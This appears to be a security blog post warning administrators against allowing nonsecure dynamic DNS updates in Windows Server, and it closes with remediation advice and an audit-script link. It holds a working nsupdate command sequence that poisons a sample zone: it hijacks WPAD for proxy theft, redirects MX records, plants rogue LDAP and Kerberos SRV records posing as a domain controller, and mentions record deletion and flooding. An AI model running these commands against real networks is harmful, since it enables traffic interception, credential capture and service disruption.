Non-Secure DNS Zones and Dynamic UpdatesΒΆ

This should go without saying, considering the big yellow exclamation mark next to the setting in Windows Server DNS, but do not allow nonsecure DNS updates on any zone even closely resembling production.

“Allowing nonsecure dynamic updates is a significant security vulnerability because updates can be accepted from untrusted sources.”

big yellow exclamation mark

big yellow exclamation mark

Allow Only Secure Dynamic Updates

Any network device can update/add/delete DNS records in the zone, merely by sending a single UDP datagram. This can easily be tested using BIND’s ‘nsupdate’. Could be scripted with a little digging and ‘netcat’. Don’t see a Metasploit module for this, and this isn’t even low-hanging fruit – this is fruit that falls into your hand.

BIND download, including binary for Windows

nsupdate man page

From any attached network device (no authentication credentials of any type needed):

nsupdate -d

server 192.168.1.180
zone monkeyboy.local

# add a host
update add whodamonkey.monkeyboy.local 86400 A 10.1.2.3

# fun with MX records
update add monkeyboy.local. 86400 MX 0 nothinghere.example.com.
send

# or just be mean
update add loopback.monkeyboy.local. 86400 A 127.0.0.1
send
update add monkeyboy.local. 86400 MX 1 loopback.monkeyboy.local.
send

# proxy theft, anyone?
update add wpad.monkeyboy.local. 86400 CNAME wpad.bad.

# Add a domain controller (they think)
update add whodamonkey.monkeyboy.local. 86400 A 10.1.2.3
send

update add _ldap._tcp.monkeyboy.local. 86400 SRV 0 0 389 whodamonkey.monkeyboy.local.
send

update add _kerberos._tcp.monkeyboy.local. 86400 SRV 0 0 88 whodamonkey.monkeyboy.local.
send

update add _ldap._tcp.dc._msdcs.monkeyboy.local. 86400 SRV 0 0 389 whodamonkey.monkeyboy.local.
send

update add _kerberos._tcp.dc._msdcs.monkeyboy.local. 86400 SRV 0 0 88 whodamonkey.monkeyboy.local.
send

exit
Results 1

Results 1

Results 2

Results 2

Note that you can delete records, as well (update delete ...). Or just randomly generate a million records of whatever type suits your fancy.

Change nonsecure zones to “None” or “Secure Only.” To quickly audit Active Directory DNS zones, use this Powershell script:

http://blogs.technet.com/b/ashleymcglone/archive/2014/08/01/dns-server-and-zone-reporting-with-powershell.aspx